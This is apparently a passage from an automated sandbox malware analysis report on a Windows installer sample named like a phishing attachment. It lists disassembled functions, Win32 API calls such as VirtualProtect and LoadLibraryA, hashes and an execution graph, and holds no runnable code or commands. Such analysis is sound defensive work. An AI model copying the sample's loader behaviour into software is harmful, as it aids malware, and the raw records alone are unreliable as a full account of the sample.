                              • Opcode Fuzzy Hash: d16b92c6e49c5f1eda150bd2065ff059c02a3c223b7b2492d8b40f99e43a7d67
                              • Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8
                              APIs
                              • CharNextA.USER32(?,*?|<>/":,00000000,00435000,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                              • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                              • CharNextA.USER32(?,00435000,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                              • CharPrevA.USER32(?,?,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Char$Next$Prev
                              • String ID: *?|<>/":
                              • API String ID: 589700163-165019052
                              • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                              • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                              • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                              • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                              APIs
                              • lstrcatA.KERNEL32(00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 00401798
                              • CompareFileTime.KERNEL32(-00000014,?,0040A418,0040A418,00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 004017C2
                                • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                • Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,761923A0), ref: 00405123
                                • Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID:
                              • API String ID: 1941528284-0
                              • Opcode ID: ec066fc1f791a28a9f0325cd86f74f0af079f58842eee79025982aaa23838273
                              • Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
                              • Opcode Fuzzy Hash: ec066fc1f791a28a9f0325cd86f74f0af079f58842eee79025982aaa23838273
                              • Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE
                              APIs
                              • GetDC.USER32(?), ref: 00401D9E
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                              • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                              • CreateFontIndirectA.GDI32(0040B818), ref: 00401E20
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CapsCreateDeviceFontIndirectRelease
                              • String ID:
                              • API String ID: 3808545654-0
                              • Opcode ID: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
                              • Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
                              • Opcode Fuzzy Hash: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
                              • Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D
                              APIs
                              • GetDlgItem.USER32(?), ref: 00401D45
                              • GetClientRect.USER32(00000000,?), ref: 00401D52
                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                              • DeleteObject.GDI32(00000000), ref: 00401D90
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                              • String ID:
                              • API String ID: 1849352358-0
                              • Opcode ID: 0eb514b26757c14dfc9e7ab691bd09cd0abb996a20804aaa0a787f0dfa13f32e
                              • Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
                              • Opcode Fuzzy Hash: 0eb514b26757c14dfc9e7ab691bd09cd0abb996a20804aaa0a787f0dfa13f32e
                              • Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38
                              APIs
                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              • API String ID: 1777923405-2657877971
                              • Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                              • Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
                              • Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                              • Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28
                              APIs
                              • lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                              • wsprintfA.USER32 ref: 0040492E
                              • SetDlgItemTextA.USER32(?,0042A870), ref: 00404941
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s
                              • API String ID: 3540041739-3551169577
                              • Opcode ID: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
                              • Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
                              • Opcode Fuzzy Hash: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
                              • Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                • Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,761923A0), ref: 00405123
                                • Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                              • String ID:
                              • API String ID: 2987980305-0
                              • Opcode ID: 490571eaf18eb528810bd7303bcbaa8e0b92f898ddca79ec3151c5cc349cda19
                              • Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
                              • Opcode Fuzzy Hash: 490571eaf18eb528810bd7303bcbaa8e0b92f898ddca79ec3151c5cc349cda19
                              • Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E
                              APIs
                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Close$Enum
                              • String ID:
                              • API String ID: 464197530-0
                              • Opcode ID: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
                              • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                              • Opcode Fuzzy Hash: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
                              • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8
                              APIs
                              • CreateDirectoryA.KERNEL32(?,?,00436400), ref: 004055D0
                              • GetLastError.KERNEL32 ref: 004055E4
                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                              • GetLastError.KERNEL32 ref: 00405603
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                              • String ID:
                              • API String ID: 3449924974-0
                              • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                              • Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
                              • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                              • Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9
                              APIs
                              • DestroyWindow.USER32(?,00000000,00402EDF,00000001), ref: 00402D12
                              • GetTickCount.KERNEL32 ref: 00402D30
                              • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                              • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                              • String ID:
                              • API String ID: 2102729457-0
                              • Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                              • Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
                              • Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                              • Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC
                              APIs
                              • IsWindowVisible.USER32(?), ref: 0040506A
                              • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                                • Part of subcall function 0040408B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Window$CallMessageProcSendVisible
                              • String ID:
                              • API String ID: 3748168415-3916222277
                              • Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                              • Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
                              • Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                              • Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA
                              APIs
                              • GetTickCount.KERNEL32 ref: 00405B7C
                              • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: nsa
                              • API String ID: 1716503409-2209301699
                              • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                              • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                              • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                              • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58
                              APIs
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
                              • CloseHandle.KERNEL32(?), ref: 00405675
                              Strings
                              • Error launching installer, xrefs: 00405652
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CloseCreateHandleProcess
                              • String ID: Error launching installer
                              • API String ID: 3712363035-66219284
                              • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                              • Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
                              • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                              • Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C
                              APIs
                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
                              • CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
                              • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: lstrlen$CharNextlstrcmpi
                              • String ID:
                              • API String ID: 190613189-0
                              • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                              • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                              • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                              • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9

                              Execution Graph

                              Execution Coverage:6.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:213
                              Total number of Limit Nodes:5
                              execution_graph 1139 6f271837 1141 6f27185a 1139->1141 1140 6f27189c 1143 6f271266 2 API calls 1140->1143 1141->1140 1142 6f27188a GlobalFree 1141->1142 1142->1140 1144 6f271a1e GlobalFree GlobalFree 1143->1144 1145 6f272ba3 1146 6f272bbb 1145->1146 1147 6f271534 2 API calls 1146->1147 1148 6f272bd6 1147->1148 973 6f2728e1 974 6f272931 973->974 975 6f2728f1 VirtualProtect 973->975 975->974 1149 6f2715d1 1155 6f2714bb 1149->1155 1151 6f27162f GlobalFree 1152 6f2715e9 1152->1151 1153 6f271604 1152->1153 1154 6f27161b VirtualFree 1152->1154 1153->1151 1154->1151 1157 6f2714c1 1155->1157 1156 6f2714c7 1156->1152 1157->1156 1158 6f2714d3 GlobalFree 1157->1158 1158->1152 1159 6f271000 1162 6f27101b 1159->1162 1163 6f2714bb GlobalFree 1162->1163 1164 6f271020 1163->1164 1165 6f271027 GlobalAlloc 1164->1165 1166 6f271024 1164->1166 1165->1166 1167 6f2714e2 3 API calls 1166->1167 1168 6f271019 1167->1168 1169 6f2710e0 1178 6f27110e 1169->1178 1170 6f2711c4 GlobalFree 1171 6f2712ad 2 API calls 1171->1178 1172 6f2711c3 1172->1170 1173 6f271266 2 API calls 1176 6f2711b1 GlobalFree 1173->1176 1174 6f271155 GlobalAlloc 1174->1178 1175 6f2711ea GlobalFree 1175->1178 1176->1178 1177 6f2712d1 lstrcpyA 1177->1178 1178->1170 1178->1171 1178->1172 1178->1173 1178->1174 1178->1175 1178->1176 1178->1177 1179 6f27103d 1180 6f27101b 5 API calls 1179->1180 1181 6f271056 1180->1181 976 6f2716db 977 6f27170b 976->977 1018 6f271a98 977->1018 979 6f271712 980 6f271834 979->980 981 6f271723 979->981 982 6f27172a 979->982 1066 6f27226f 981->1066 1050 6f2722b1 982->1050 987 6f271770 1079 6f272498 987->1079 988 6f27178e 991 6f271794 988->991 992 6f2717dc 988->992 989 6f271740 994 6f271746 989->994 999 6f271751 989->999 990 6f271759 1001 6f27174f 990->1001 1076 6f272c83 990->1076 1098 6f27156b 991->1098 997 6f272498 11 API calls 992->997 994->1001 1060 6f2729f8 994->1060 1004 6f2717cd 997->1004 998 6f271776 1090 6f271559 998->1090 1070 6f272672 999->1070 1001->987 1001->988 1009 6f271823 1004->1009 1104 6f27245e 1004->1104 1006 6f271757 1006->1001 1007 6f272498 11 API calls 1007->1004 1009->980 1012 6f27182d GlobalFree 1009->1012 1012->980 1015 6f27180f 1015->1009 1108 6f2714e2 wsprintfA 1015->1108 1016 6f271808 FreeLibrary 1016->1015 1111 6f271215 GlobalAlloc 1018->1111 1020 6f271abc 1112 6f271215 GlobalAlloc 1020->1112 1022 6f271cde GlobalFree GlobalFree GlobalFree 1023 6f271cfb 1022->1023 1041 6f271d45 1022->1041 1024 6f2720b1 1023->1024 1033 6f271d10 1023->1033 1023->1041 1026 6f2720d3 GetModuleHandleA 1024->1026 1024->1041 1025 6f271b9b GlobalAlloc 1027 6f271ac7 1025->1027 1029 6f2720e4 LoadLibraryA 1026->1029 1030 6f2720f9 1026->1030 1027->1022 1027->1025 1028 6f271c04 GlobalFree 1027->1028 1031 6f271be6 lstrcpyA 1027->1031 1032 6f271bf0 lstrcpyA 1027->1032 1036 6f272011 1027->1036 1040 6f271f95 1027->1040 1027->1041 1045 6f271ed7 GlobalFree 1027->1045 1046 6f271224 2 API calls 1027->1046 1113 6f271534 GlobalSize GlobalAlloc 1027->1113 1028->1027 1029->1030 1029->1041 1119 6f2715c2 GetProcAddress 1030->1119 1031->1032 1032->1027 1033->1041 1115 6f271224 1033->1115 1035 6f27214a 1039 6f272157 lstrlenA 1035->1039 1035->1041 1036->1041 1044 6f272055 lstrcpyA 1036->1044 1038 6f27210b 1038->1035 1048 6f272134 GetProcAddress 1038->1048 1120 6f2715c2 GetProcAddress 1039->1120 1118 6f271215 GlobalAlloc 1040->1118 1041->979 1044->1041 1045->1027 1046->1027 1048->1035 1049 6f271f9d 1049->979 1051 6f2722ca 1050->1051 1053 6f272406 GlobalFree 1051->1053 1054 6f272378 GlobalAlloc MultiByteToWideChar 1051->1054 1056 6f271224 GlobalAlloc lstrcpynA 1051->1056 1057 6f2723c5 1051->1057 1122 6f2712ad 1051->1122 1053->1051 1055 6f271730 1053->1055 1054->1057 1058 6f2723a4 GlobalAlloc CLSIDFromString GlobalFree 1054->1058 1055->989 1055->990 1055->1001 1056->1051 1057->1053 1126 6f272606 1057->1126 1058->1053 1062 6f272a0a 1060->1062 1061 6f272aaf EnumWindows 1065 6f272acd 1061->1065 1062->1061 1064 6f272b99 1064->1001 1129 6f2729a4 1065->1129 1067 6f272284 1066->1067 1068 6f27228f GlobalAlloc 1067->1068 1069 6f271729 1067->1069 1068->1067 1069->982 1074 6f2726a2 1070->1074 1071 6f272750 1073 6f272756 GlobalSize 1071->1073 1075 6f272760 1071->1075 1072 6f27273d GlobalAlloc 1072->1075 1073->1075 1074->1071 1074->1072 1075->1006 1077 6f272c8e 1076->1077 1078 6f272cce GlobalFree 1077->1078 